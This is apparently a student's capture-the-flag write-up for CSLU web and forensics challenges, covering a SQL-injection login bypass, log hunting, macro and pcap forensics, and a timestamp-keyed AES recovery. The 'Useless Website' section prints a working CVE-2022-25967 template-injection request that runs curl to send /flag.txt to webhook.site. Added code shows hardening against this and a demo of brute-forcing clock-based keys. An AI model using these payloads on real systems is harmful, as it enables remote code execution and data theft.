# Babysqli

Description
1. Type: #web
2. Desc: -
3. Tools:
   - [sqli cheatsheet](https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet/)
4. File: `source file`

Flag: -

---

- Just type `'-'` for admin and password.

---

# Access log

Description
1. Type: #web
2. Desc: -
3. Tools: -
4. File: `access.log`

Flag: ||CSLU{this_is_the_flag_for_th15_challeng3}||

---

- When scrolling through the logs, I found out that most of them were 404 or errors, so I tried to search for 200 only and I got this sus link.

```zsh
172.26.228.247 - - [08/Nov/2024:21:46:13 +0800] "GET /pastebin.com/us5L3fRp HTTP/1.1" 200 437 "-" "gobuster/3.6"
```

- The `pastebin` will lead you directly to the flag.

# Forensics

## Dr. Mals

1. Download the Dr. Mals word file
2. Use Oletools - olevba to decrypt this file
   - ![image](https://github.com/user-attachments/assets/f6c2bc3c-cc2f-40dc-a40b-8eaef09150cd)
4. With the use of CyberChef, we can find out the encoded text
   - ![image](https://github.com/user-attachments/assets/927f7112-1acd-487a-8c57-a5a9fa5fa144)
5. Searching the website gave this
   - ![image](https://github.com/user-attachments/assets/3f0cf691-eea1-45ce-9dd9-30e9442d1a79)
6. Let's decode this
   - With the use of an online decoder we can find out the flag
   - ![image](https://github.com/user-attachments/assets/62c1dd32-c3a9-4a8d-9f3b-3b331119dba8)
7. That's it.

#### Acknowledgement
Thx to Akram for providing Hint

## RE:Memory Delete

1. First, we download the attached file given by the challenge.
   - Challenge.7z
2. Unzip it.
   - Challenge.ad1 files inside.
3. .ad1 is an image file, so let's use FTK Imager to find the deleted file
4. ![image](https://github.com/user-attachments/assets/98a6ce23-53b1-4a37-9a8c-9a9cae49e6f1)
5. There goes the flag

## Skyfall

*Pain killer, My Skill issue... XD*

1. Download the file attached by the challenge.
   - capture.pcapng
2. Use wireshark to open the pcapng file
3. See the clue given, Love the EDITED LEWIS VERSION files and lost the flag.
   - ![image](https://github.com/user-attachments/assets/9ec25fe0-ecd3-4587-a4e7-5887377fbfbe)
4. File -> Export -> Http, and save all the files.
5. We can see there are 5 files exported, 2 text files with the words ```File received successfully!``` and ```file_data=16ae9187d13259788a97aef16a7d50f8b6376fbcba92a0f53e7e68d9f562a3a6576a3183a8dc8631c64fbd9147c8b608```
   - useful for later
6. And there is a file with big data, 24,345kb, so let us see what file that is.
   - ![image](https://github.com/user-attachments/assets/395b8f53-8888-4af0-bf28-ae6f5b156992)
7. Looks like it is an ELF file
   ![image](https://github.com/user-attachments/assets/a9223eb5-5494-4476-b76e-94ca61886bab)
8. I managed to find a website to extract the ELF file: [EzyZIP](https://www.ezyzip.com/open-extract-elf-file.html#)
9. We can see the largest file is here after extracting
   - ![image](https://github.com/user-attachments/assets/d61f4dc0-bd2e-4e85-922c-cbaaa903fb5e)

   After a long time searching, I couldn't find any way to extract pydata... skill issue XD
10. At the end of the day, my friend told me there is something called ```Pyinstxtractor``` that can extract it.
    - ![image](https://github.com/user-attachments/assets/647ba1e4-5257-4eae-8e27-94885a3b018b)
    - This is what I found
11. okayyyy here it is
    - ![image](https://github.com/user-attachments/assets/839516f6-2d26-4c28-af8e-cfbd172314e6)
12. There are a lot of files inside, but the one named ``` -lewis-edited-version.pyc``` is the most suspicious.
    - ![image](https://github.com/user-attachments/assets/b3e6721f-12fd-4eba-a1fc-7d8d92ac3bc0)
13. With the use of this website [Pylingual](https://pylingual.io/), I converted the pyc file to py
    - ![image](https://github.com/user-attachments/assets/575f7882-fe26-4d1c-91f5-69de17c6099c)
14. We can see it is an AES encryption function and the key is the time at which the user encrypted when downloaded, so let's go back to wireshark and find the date when she successfully downloaded.
    - ![image](https://github.com/user-attachments/assets/f286e913-9441-4f6b-8273-1b7df152b17d)
    - We can find out that the epoch for the time she downloaded the file is ```1733988750```
15. Then use GPT xd to find the key out
    - ![image](https://github.com/user-attachments/assets/c5d87093-080a-410e-b361-ce07d7c64747)
    - ps: I also dk why need to use ```1733988749```, just told by my friend to use it, can't find anything that supports this epoch XD.
15. Okay, then let us go to decrypt it. Use cyberchef
16. ![image](https://github.com/user-attachments/assets/0a6837ae-ddf5-41d3-a810-7318c56a4607)

Here's the flag.

Okay it's maybe a bit harder than I thought. cry die.

#### Acknowledgement
Thx to Bakayang for providing solution at the end of the day

# WEB

## Useless Website

1. Download the source code of the website
2. We can see there's something in the package.json file
   - ![image](https://github.com/user-attachments/assets/ded38f60-d45c-406f-87ca-353241b395e5)
3. Searching on the internet, ```CVE-2022-25967``` shows that there is some leakage that can be used on the eta framework.
4. In burpsuite, intercept the web request and change it to this

```
POST /utils/settings HTTP/1.1
Host: 5.75.155.50:1341
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Type: application/json
Upgrade-Insecure-Requests: 1
If-None-Match: W/"1057-ih1IUXlwncna8aHynJLYIHjiX30"
Priority: u=0, i
Content-Length: 292

{
  "settings": {
    "view options": {
      "varName": "x=process.mainModule.require('child_process').execSync('curl https://webhook.site/self id/$(cat /flag.txt)')",
      "include": false,
      "includeFile": false,
      "useWith": true
    }
  }
}
```

5. And we can find out the flag at the end of the webhook link.
   - ![image](https://github.com/user-attachments/assets/ee3ce174-09de-43c1-82ea-43f979aa075d)
   - ```CSLU{wh4ts_y0ur_et4?}```
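
The defensive side of the request in step 4 of Useless Website, as an added example that is not taken from the challenge source or from eta. Before eta 2.0.0 (CVE-2022-25967), view options received through the Express render API could overwrite the template engine configuration, so a handler should build its render data from an allowlist and refuse any client-supplied `settings` key. The field names `theme` and `language` and both helper names are assumptions.

```javascript
// Added example: hypothetical hardening for a handler such as POST /utils/settings.
// The field names in ALLOWED_FIELDS are assumptions, not from the challenge source.
const ALLOWED_FIELDS = { theme: /^(light|dark)$/, language: /^[a-z]{2}$/ };

// Keys a request body must never carry into res.render(): Express hands app
// settings to the view engine under `settings`; the rest block prototype tricks.
const RESERVED_KEYS = new Set(["settings", "__proto__", "constructor", "prototype"]);

// Recursively list reserved keys found anywhere in a parsed JSON body.
function findReservedKeys(value, path = "") {
  if (value === null || typeof value !== "object") return [];
  const hits = [];
  for (const key of Object.keys(value)) {
    const here = path ? `${path}.${key}` : key;
    if (RESERVED_KEYS.has(key)) hits.push(here);
    hits.push(...findReservedKeys(value[key], here));
  }
  return hits;
}

// Build render data from scratch: reject reserved keys, then copy only
// allowlisted string fields whose value matches the expected pattern.
function buildRenderData(body) {
  const reserved = findReservedKeys(body);
  if (reserved.length > 0) {
    return { ok: false, reason: `reserved keys in body: ${reserved.join(", ")}` };
  }
  const data = Object.create(null);
  for (const [field, pattern] of Object.entries(ALLOWED_FIELDS)) {
    const v = body ? body[field] : undefined;
    if (typeof v === "string" && pattern.test(v)) data[field] = v;
  }
  return { ok: true, data };
}

// Constructed sample bodies. The second has the shape of the request above,
// with an inert placeholder where the injected code would be.
const benignBody = { theme: "dark", language: "en", extra: "ignored" };
const hostileBody = {
  settings: { "view options": { varName: "x=PLACEHOLDER", useWith: true } },
};

console.log(buildRenderData(benignBody));
console.log(buildRenderData(hostileBody));
```

A rejected body is worth logging with the client address, since a `settings` key in user input has no legitimate use here. Upgrading eta to 2.0.0 or later remains the primary fix.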
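
For Skyfall steps 14 to 15, where the key comes from a timestamp and the working epoch (`1733988749`) is one second off the one read from the capture (`1733988750`): a packet timestamp only approximates the moment the program read its clock, so checking a small window of seconds around it is more reliable than trusting a single value. This is an added example, not the challenge's code. The key derivation (SHA-256 of the decimal epoch), AES-256-CBC with an all-zero IV, and the sample ciphertext are assumptions constructed for illustration.

```javascript
// Added example: why a timestamp-derived key is weak, and how a +/- window
// around the observed time finds it. ASSUMPTIONS (the real derivation is only
// in the screenshot): key = SHA-256(decimal epoch), AES-256-CBC, all-zero IV.
const crypto = require("crypto");

const ZERO_IV = Buffer.alloc(16);
const deriveKey = (epoch) =>
  crypto.createHash("sha256").update(String(epoch)).digest();

// Encrypt a constructed sample the way the assumed program would.
function encryptAt(epoch, plaintext) {
  const c = crypto.createCipheriv("aes-256-cbc", deriveKey(epoch), ZERO_IV);
  return Buffer.concat([c.update(plaintext, "utf8"), c.final()]);
}

// Try the observed second first, then 1, 2, ... seconds either side.
// A candidate counts only if PKCS#7 padding is valid AND the known prefix matches.
function recoverByTimestamp(ciphertext, observed, window, prefix) {
  for (let off = 0; off <= window; off++) {
    const candidates = off === 0 ? [observed] : [observed - off, observed + off];
    for (const epoch of candidates) {
      try {
        const d = crypto.createDecipheriv("aes-256-cbc", deriveKey(epoch), ZERO_IV);
        const pt = Buffer.concat([d.update(ciphertext), d.final()]).toString("utf8");
        if (pt.startsWith(prefix)) return { epoch, plaintext: pt, tried: 2 * off + 1 };
      } catch (err) {
        // Wrong key: final() throws on bad padding, so move to the next second.
      }
    }
  }
  return null;
}

// Constructed sample: encrypted one second before the observed packet time.
const OBSERVED_EPOCH = 1733988750; // epoch read from the capture (from the page)
const SAMPLE_FLAG = "CSLU{constructed_sample_not_the_real_flag}";
const sampleCiphertext = encryptAt(OBSERVED_EPOCH - 1, SAMPLE_FLAG);

console.log(recoverByTimestamp(sampleCiphertext, OBSERVED_EPOCH, 5, "CSLU{"));
```

With a window of a few seconds the whole key space is a handful of candidates, which is why a key should come from a CSPRNG rather than from the clock.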